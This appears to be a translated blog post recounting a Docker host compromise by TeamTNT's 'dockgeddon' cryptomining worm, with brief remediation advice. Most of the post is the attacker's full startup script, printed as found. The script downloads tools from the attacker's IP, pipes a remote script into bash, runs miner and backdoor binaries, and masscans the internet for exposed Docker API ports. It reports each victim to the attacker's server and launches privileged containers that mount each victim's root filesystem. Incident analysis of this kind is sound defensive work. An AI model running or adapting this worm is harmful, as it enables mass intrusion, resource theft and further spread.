当前位置:网站首页>Abnormal dockgeddon causes CPU 100%
Abnormal dockgeddon causes CPU 100%
2022-06-24 16:25:00 【Zhanglinxi】
abnormal dockgeddon Lead to cpu 100%
Problem description
1, Receive the nail alarm , Prompt the machine cpu Utilization rate exceeding 90%
2, Then log in to monitor and find the corresponding machine
Is, indeed, CPU The utilization rate has reached 100% .
3, Check container monitoring to determine which container is causing the problem ( Because I am running on this machine docker)
It can also be used without container monitoring docker stats To check the resource consumption of each container .
4, Find the container in question , Discovery is not a container for our business , So I started to analyze
Analyze the problem docker
see docker The start command of , It is found that his startup is to execute an internal script
#!/bin/bash
RATE_TO_SCAN=500000
if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then wget http://45.9.148.85/bin/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type docker 2>/dev/null; then curl -sLk https://get.docker.com | bash ; fi
docker stop $(docker ps | grep -v 'CONTAINER' | grep -v 'tntpwner2\|b0rgdrone24\|dockgeddon' | awk '{print $1}')
clear ; echo "" ; echo ""
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6
chmod +x /usr/bin/zgrab
chmod +x /root/dockerd
chmod +x /root/TNTfeatB0RG
/root/TNTfeatB0RG
nice -n -20 /root/dockerd || /root/dockerd
dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";
for ipaddy in ${!rndstr}
do
TARGET=$ipaddy:$port
echo '##################################################'
curl -sLk http://45.9.148.85/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run -d --net host --privileged --name dockgeddon -v /:/host mangletmpuser/dockgeddon
done
}
while true
do
RANGE=$(curl -sLk http://45.9.148.85/input/da_range.php)".0.0.0/8"
dAPIpwn $RANGE 2375 $RATE_TO_SCAN
dAPIpwn $RANGE 2376 $RATE_TO_SCAN
dAPIpwn $RANGE 2377 $RATE_TO_SCAN
dAPIpwn $RANGE 4244 $RATE_TO_SCAN
dAPIpwn $RANGE 4243 $RATE_TO_SCAN
doneTake a look at the startup script , I knew my server had been mined by others . Last in Aqua Website blog The corresponding information was found on
Moving blog content
TeamTNT in the light of Docker and Kubernetes The environment has launched a new campaign . By using managed in Docker Hub A set of container images in , An attacker can configure the wrong Docker A daemon ,Kubeflow Dashboard and Weave Scope Position as target , Use these environments to steal cloud credentials , Open the back door , Mining cryptocurrencies and launching a worm . Look for the next victim . In this blog , I will explore these container images and their design uses .
We are hacked because we expose this port to the public network .
terms of settlement
1, delete mirror
2, Shield the sensitive ports above to provide external access
边栏推荐
- Nature publishes significant progress in quantum computing: the first quantum integrated circuit implementation in history
- Enterprise security attack surface analysis tool
- Batch BOM Bapi test
- Product level design of a project in SAP mm
- Understanding of deep separable convolution, block convolution, extended convolution, transposed convolution (deconvolution)
- 2021-05-02: given the path of a file directory, write a function
- MySQL date timestamp conversion
- 2021-04-28: force buckle 546, remove the box. Give some boxes of different colors
- Dismantle the industrial chain of synthetic rubber industry, and the supply chain may become a sharp weapon for breakthrough
- What can Lu yuanjiu Jiao buy?
猜你喜欢
![[interview high frequency questions] sequential DP questions with difficulty of 3/5 and direct construction](/img/32/720ffa63a90cd5d37460face3fde38.png)
[interview high frequency questions] sequential DP questions with difficulty of 3/5 and direct construction

C. K-th Not Divisible by n(数学+思维) Codeforces Round #640 (Div. 4)

用 Oasis 开发一个跳一跳(一)—— 场景搭建

【应用推荐】最近大火的Apifox & Apipost 上手体验与选型建议

【面试高频题】难度 3/5,可直接构造的序列 DP 题

Cap: multiple attention mechanism, interesting fine-grained classification scheme | AAAI 2021

Build go command line program tool chain

Problems encountered in the work of product manager

There are potential safety hazards Land Rover recalls some hybrid vehicles

C. K-th not divisible by n (Mathematics + thinking) codeforces round 640 (Div. 4)
随机推荐
What is browser fingerprint recognition?
【附下载】汉化版Awvs安装与简单使用
Ps\ai and other design software pondering notes
How to easily realize online karaoke room and sing "mountain sea" with Wang Xinling
AI structured intelligent security video monitoring technology, supporting the protective umbrella of the reserve / wild animals
@There is a free copyright protection service for enterprises in Dawan District
Logging is not as simple as you think
用 Oasis 开发一个跳一跳(一)—— 场景搭建
Pytorch transpose convolution
[go] concurrent programming channel
Using alicloud RDS for SQL Server Performance insight to optimize database load - first understanding of performance insight
[tke] troubleshooting tips for container problems
Tencent blue whale Zhiyun community version v6.0.3 was officially released together with the container management platform!
One Minute! No code! Add [statistical analysis] to the website
Applet - use of template
2021-05-01: given an ordered array arr, it represents the points located on the X axis. Given a positive number k
存在安全隐患 部分冒险家混动版将召回
Cap: multiple attention mechanism, interesting fine-grained classification scheme | AAAI 2021
Global and Chinese markets of stainless steel barbecue ovens 2022-2028: Research Report on technology, participants, trends, market size and share
Load MySQL table data consumption quick installation configuration through kafka/flink